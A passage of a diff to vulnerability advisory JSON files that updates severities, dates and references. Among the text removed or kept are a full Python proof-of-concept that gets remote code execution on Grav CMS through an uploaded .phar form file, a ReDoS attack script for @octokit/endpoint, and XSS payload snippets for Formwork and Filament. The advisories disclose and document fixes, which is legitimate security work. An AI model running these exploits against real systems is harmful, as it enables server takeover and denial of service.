Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -49,9 +54,9 @@ "CWE-287", "CWE-434" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T16:58:33Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:21Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json index 29d2d42046096..6575c789053ec 100644 --- a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json +++ b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5pxr-7m4j-jjc6", - "modified": "2025-03-19T14:49:46Z", + "modified": "2026-02-18T23:46:36Z", "published": "2024-06-07T19:37:10Z", "aliases": [ "CVE-2024-37160" ], "summary": "Cross-site scripting (XSS) vulnerability in Description metadata", - "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).\n\n### PoC\n1. Log in with an Administrator user account.\n2. Navigate to /panel/options/site/.\n3. Inject the JS script by adding to the description field.\n4. Simulate a victim who is not a site member visiting the website. You will notice that the JS script executes on every page they vis\n\n![image](https://github.com/getformwork/formwork/assets/170840940/1c40be24-3367-4c80-bb44-9db64ef88970)\n![image](https://github.com/getformwork/formwork/assets/170840940/68dd5bff-9db1-441b-a3b3-a0c014565f59)\n![image](https://github.com/getformwork/formwork/assets/170840940/3cd84c39-9b44-49d0-8b6a-6c8aeda7e49f)\n![image](https://github.com/getformwork/formwork/assets/170840940/f45afd87-80e9-4cf1-8121-bb4e121849c9)", + "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json index e74db3d61a505..2ddc41e7c50d2 100644 --- a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json +++ b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-x4gp-pqpj-f43q", - "modified": "2025-07-28T15:46:43Z", + "modified": "2026-02-17T19:30:26Z", "published": "2024-06-18T21:56:24Z", "aliases": [ "CVE-2024-58262" ], "summary": "curve25519-dalek has timing variability in `curve25519-dalek`'s `Scalar29::sub`/`Scalar52::sub`", "details": "Timing variability of any kind is problematic when working with potentially secret values such as elliptic curve scalars, and such issues can potentially leak private keys and other secrets. Such a problem was recently discovered in `curve25519-dalek`.\n\nThe `Scalar29::sub` (32-bit) and `Scalar52::sub` (64-bit) functions contained usage of a mask value inside a loop where LLVM saw an opportunity to insert a branch instruction (`jns` on x86) to conditionally bypass this code section when the mask value is set to zero as can be seen in godbolt:\n\n- 32-bit (see L106): https://godbolt.org/z/zvaWxzvqv\n- 64-bit (see L48): https://godbolt.org/z/PczYj7Pda\n\nA similar problem was recently discovered in the Kyber reference implementation:\n\nhttps://groups.google.com/a/list.nist.gov/g/pqc-forum/c/hqbtIGFKIpU/m/cnE3pbueBgAJ\n\nAs discussed on that thread, one portable solution, which is also used in this PR, is to introduce a volatile read as an optimization barrier, which prevents the compiler from optimizing it away.\n\nThe fix can be validated in godbolt here:\n\n- 32-bit: https://godbolt.org/z/jc9j7eb8E\n- 64-bit: https://godbolt.org/z/x8d46Yfah\n\nThe problem was discovered and the solution independently verified by Alexander Wagner and Lea Themint using their DATA tool:\n\nhttps://github.com/Fraunhofer-AISEC/DATA", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [ { "package": { @@ -56,7 +61,7 @@ "cwe_ids": [ "CWE-203" ], - "severity": "MODERATE", + "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2024-06-18T21:56:24Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json index 017745cd2c54d..39731d5869690 100644 --- a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json +++ b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-9h9q-qhxg-89xr", - "modified": "2024-10-23T17:40:43Z", + "modified": "2026-02-17T19:41:13Z", "published": "2024-09-27T20:51:01Z", "aliases": [ "CVE-2024-47186" ], "summary": "Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting", "details": "### Summary\n\nIf values passed to a `ColorColumn` or `ColumnEntry` are not valid and contain a specific set of characters, applications are vulnerable to XSS attack against a user who opens a page on which a color column or entry is rendered.\n\nVersions of Filament from v3.0.0 through v3.2.114 are affected.\n\nPlease upgrade to Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115).\n\n### PoC\n\nFor example, using a value such as:\n\n```html\nblue;\"> $state,\n])>\n```\n\nSince Laravel does not escape special characters within the `@style` Blade directive, the effective output HTML would be:\n\n```html\n
\n```\n\nCreating the opportunity for arbitrary JS to run if it was stored in the database.\n\n### Response\n\nThis vulnerability (in `ColorColumn` only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.\n\nThe review process concluded on 27/09/2024, which revealed the issue was also present in `ColorEntry`. This was fixed the same day and Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115) followed to escape any special characters while outputting inline styles like this:\n\n```blade\n
$state,\n])>
\n```\n\nAlthough these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [ { "package": { @@ -71,7 +76,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "CRITICAL", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-09-27T20:51:01Z", "nvd_published_at": "2024-09-27T21:15:03Z" diff --git a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json index 280d5caae63c8..ae9c28bfdeebc 100644 --- a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json +++ b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-76p7-773f-r4q5", - "modified": "2026-01-29T12:30:25Z", + "modified": "2026-02-17T03:30:15Z", "published": "2025-02-10T18:30:47Z", "aliases": [ "CVE-2024-11831" @@ -64,6 +64,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-11831" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2769" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1536" diff --git a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json index b83b5f4fb7e45..113ac1a613404 100644 --- a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json +++ b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-x4c5-c7rf-jjgv", - "modified": "2025-02-14T22:19:51Z", + "modified": "2026-02-17T16:11:00Z", "published": "2025-02-14T17:56:18Z", "aliases": [ "CVE-2025-25285" ], "summary": "@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking", - "details": "### Summary\nBy crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.\n\n### Details\nThe issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:\n```ts\nheaders.accept.match(/[\\w-]+(?=-preview)/g) || ([] as string[]);\n```\nThe regular expression `/[\\w-]+(?=-preview)/g` encounters a backtracking issue when it processes `a large number of characters` followed by the `-` symbol.\ne.g., the attack string: \n```js\n\"\" + \"A\".repeat(100000) + \"-\"\n```\n\n### PoC\n[The gist](https://gist.github.com/ShiyuBanzhou/a17202ac1ad403a80ca302466d5e56c4)\nHere is the reproduction process for the vulnerability:\n1. run 'npm i @octokit/endpoint'\n2. Move `poc.js` to the root directory of the same level as `README.md`\n3. run 'node poc.js'\nresult:\n4. then the program will stuck forever with high CPU usage\n```js\nimport { endpoint } from \"@octokit/endpoint\";\n// import { parse } from \"./node_modules/@octokit/endpoint/dist-src/parse.js\";\nconst options = { \n method: \"POST\",\n url: \"/graphql\", // Ensure that the URL ends with \"/graphql\"\n headers: {\n accept: \"\" + \"A\".repeat(100000) + \"-\", // Pass in the attack string\n \"content-type\": \"text/plain\",\n },\n mediaType: {\n previews: [\"test-preview\"], // Ensure that mediaType.previews exists and has values\n format: \"raw\", // Optional media format\n },\n baseUrl: \"https://api.github.com\",\n};\n\nconst startTime = performance.now();\nendpoint.parse(options);\nconst endTime = performance.now();\nconst duration = endTime - startTime;\nconsole.log(`Endpoint execution time: ${duration} ms`);\n```\n1. **Import the `endpoint` module**: First, import the `endpoint` module from the npm package `@octokit/endpoint`, which is used for handling GitHub API requests.\n\n2. **Construct the `options` object that triggers a ReDoS attack**: The following member variables are critical in constructing the `options` object:\n- `url`: Set to `\"/graphql\"`, ensuring the URL ends with `/graphql` to match the format for GitHub's GraphQL API.\n- `headers`:\n> `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint package`, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(? `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint` package, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(?\") into the Role=User parameter in the /panel/users/{name}/profile page, which is the user profile update page.\nDoing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\n\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.\n\n### PoC\n\n![2025-02-27_10-25](https://github.com/user-attachments/assets/4b5a2d71-3397-4a5b-8464-35752376115a)\n\n1. Intercept the request and inject an input that will trigger an error.\n\n![2025-02-27_10-25_1](https://github.com/user-attachments/assets/a888c109-a724-4478-ae80-d9e8b05ef1aa)\n\n![image](https://github.com/user-attachments/assets/e81bb9fc-8c92-413c-8cc0-0bcffd2e2922)\n\n2.After that, it will be observed that the system is shut down or completely broken. Even changing the browser or resetting the server will not be able to restore it.", + "details": "### Summary\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\nThe attack involves injecting any invalid user role value. Doing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json index b09f8f6bf94da..e0a593b17c8f7 100644 --- a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json +++ b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-vf6x-59hh-332f", - "modified": "2025-03-17T20:27:03Z", + "modified": "2026-02-18T23:47:22Z", "published": "2025-03-01T00:11:46Z", "aliases": [], "summary": " Formwork has a cross-site scripting (XSS) vulnerability in Site title", - "details": "### Summary\n\nThe site title field at /panel/options/site/allows embedding JS tags, which can be used to attack all members of the system. This is a widespread attack and can cause significant damage if there is a considerable number of users.\n\n### Impact\n\nThe attack is widespread, leveraging what XSS can do. This will undoubtedly impact system availability.\n\n### Patches\n- [**Formwork 2.x** (aa3e9c6)](https://github.com/getformwork/formwork/commit/aa3e9c684035d9e8495169fde7c57d97faa3f9a2) escapes site title from panel header navigation.\n\n### Details\n\nBy embedding \" Out of bounds access.\n\nAs T1 has not scheduled after T0 set the TRANSIT bit, it exits with the\nTRANSIT bit set. sched_mm_cid_remove_user() clears the TRANSIT bit in\nthe task and drops the CID, but it does not touch the per CPU storage.\nThat's functionally correct because a CID is only owned by the CPU when\nthe ONCPU bit is set, which is mutually exclusive with the TRANSIT flag.\n\nNow sched_mm_cid_exit() assumes that the CID is CPU owned because the\nprior mode was per CPU. It invokes mm_drop_cid_on_cpu() which clears the\nnot set ONCPU bit and then invokes clear_bit() with an insanely large\nbit number because TRANSIT is set (bit 29).\n\nPrevent that by actually validating that the CID is CPU owned in\nmm_drop_cid_on_cpu().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23225" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81f29975631db8a78651b3140ecd0f88ffafc476" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json b/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json new file mode 100644 index 0000000000000..13e6a6e75955e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p52x-wxj2-j8jr/GHSA-p52x-wxj2-j8jr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p52x-wxj2-j8jr", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68043" + ], + "details": "Missing Authorization vulnerability in LottieFiles LottieFiles lottiefiles allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LottieFiles: from n/a through <= 3.0.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68043" + }, + { + "type": "WEB", + "url": 